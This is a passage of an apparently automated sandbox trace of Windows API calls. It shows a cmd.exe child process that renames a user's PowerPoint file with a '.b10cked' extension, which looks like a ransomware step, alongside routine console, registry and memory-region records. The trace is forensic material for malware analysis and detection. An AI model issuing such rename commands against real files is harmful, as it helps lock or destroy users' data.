[0235.385] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.385] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.385] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.385] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.385] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.385] SetConsoleInputExeNameW () returned 0x1 [0235.385] GetConsoleOutputCP () returned 0x1b5 [0235.385] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.386] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.386] exit (_Code=0) Process: id = "638" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e80" os_pid = "0xfa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = 
"9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35088 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35089 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35090 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35091 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35092 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35093 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35094 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35095 start_va = 0x7ffb0000 end_va = 
0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35096 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35097 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35282 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35283 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35284 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35285 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 35286 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 35287 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35288 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35289 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35290 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35291 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35292 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35293 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35294 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35295 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35296 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 35297 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35298 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35299 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35300 
start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35301 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35302 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35303 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 35304 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 35305 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 878 os_tid = 0xb1c [0234.810] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eff5c | out: lpSystemTimeAsFileTime=0x1eff5c*(dwLowDateTime=0xbf6bd1c0, dwHighDateTime=0x1d440a9)) [0234.810] GetCurrentProcessId () returned 0xfa8 [0234.810] GetCurrentThreadId () returned 0xb1c [0234.810] GetTickCount () returned 0x407bd [0234.810] QueryPerformanceCounter (in: lpPerformanceCount=0x1eff54 | out: lpPerformanceCount=0x1eff54*=29159898369) returned 1 [0234.810] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.810] __set_app_type (_Type=0x1) [0234.810] __p__fmode () returned 0x76b331f4 [0234.810] __p__commode () returned 0x76b331fc [0234.810] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.811] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.811] GetCurrentThreadId () returned 0xb1c [0234.811] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb1c) returned 0x38 
[0234.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.811] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.811] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.811] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.811] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efeec | out: phkResult=0x1efeec*=0x0) returned 0x2 [0234.811] VirtualQuery (in: lpAddress=0x1eff23, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.811] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.811] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.811] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.811] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.811] GetConsoleOutputCP () returned 0x1b5 [0234.811] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.812] 
SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.812] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.812] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.812] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.812] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.812] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.812] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.812] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.812] GetEnvironmentStringsW () returned 0x290180* [0234.813] FreeEnvironmentStringsW (penv=0x290180) returned 1 [0234.813] GetEnvironmentStringsW () returned 0x290180* [0234.813] FreeEnvironmentStringsW (penv=0x290180) returned 1 [0234.813] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee5c | out: phkResult=0x1eee5c*=0x40) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0xa8, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x1, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x1, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x0, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x40, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x40, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x40, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegCloseKey (hKey=0x40) returned 0x0 [0234.813] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee5c | out: phkResult=0x1eee5c*=0x40) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x40, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x1, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x1, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee64, 
lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x0, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x9, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x9, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x9, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegCloseKey (hKey=0x40) returned 0x0 [0234.814] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.814] srand (_Seed=0x5b8863c2) [0234.814] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"" [0234.814] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"" [0234.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.814] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2918e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.814] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.814] 
GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.814] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.814] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.814] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.814] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.814] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.814] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.814] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.814] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.814] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.814] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.815] GetEnvironmentStringsW () returned 0x2922d0* [0234.815] FreeEnvironmentStringsW (penv=0x2922d0) returned 1 [0234.815] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.815] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.815] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.815] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.815] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.815] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.815] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.815] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.815] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.815] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.815] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x1efc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.815] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efc28, lpFilePart=0x1efc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efc24*="Desktop") returned 0x18 [0234.815] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.815] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef9a4 | out: lpFindFileData=0x1ef9a4) returned 0x290010 [0234.815] FindClose (in: hFindFile=0x290010 | out: hFindFile=0x290010) returned 1 [0234.815] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef9a4 | out: lpFindFileData=0x1ef9a4) returned 0x290010 [0234.816] FindClose (in: hFindFile=0x290010 | out: hFindFile=0x290010) returned 1 [0234.816] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef9a4 | out: lpFindFileData=0x1ef9a4) returned 0x290010 [0234.816] FindClose (in: hFindFile=0x290010 | out: hFindFile=0x290010) returned 1 [0234.816] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.816] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.816] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.816] GetEnvironmentStringsW () returned 0x292af0* [0234.816] FreeEnvironmentStringsW (penv=0x292af0) returned 1 [0234.816] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.816] GetConsoleOutputCP () returned 0x1b5 [0234.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.817] GetUserDefaultLCID () returned 0x409 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, 
cchData=8 | out: lpLCData=":") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efd68, cchData=128 | out: lpLCData="0") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efd68, cchData=128 | out: lpLCData="0") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efd68, cchData=128 | out: lpLCData="1") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.817] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.817] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.818] GetConsoleTitleW (in: lpConsoleTitle=0x2808e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.818] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.818] GetProcAddress (hModule=0x76910000, 
lpProcName="CopyFileExW") returned 0x7694ac6c [0234.818] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.818] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.819] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.819] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.819] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.819] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.819] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.819] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.819] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.822] GetConsoleTitleW (in: lpConsoleTitle=0x1efa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.822] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.822] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.822] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.822] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.822] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.822] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.822] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.822] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.822] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.822] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.822] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.822] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.822] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.822] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.822] 
_wcsicmp (_String1="move", _String2="RD") returned -5 [0234.822] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.822] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.822] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.822] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.822] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.822] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.822] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.822] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.823] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.823] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.823] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.823] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.823] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.823] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.823] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.823] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.824] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.824] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.824] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef81c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef814, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef814*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.824] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.824] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", 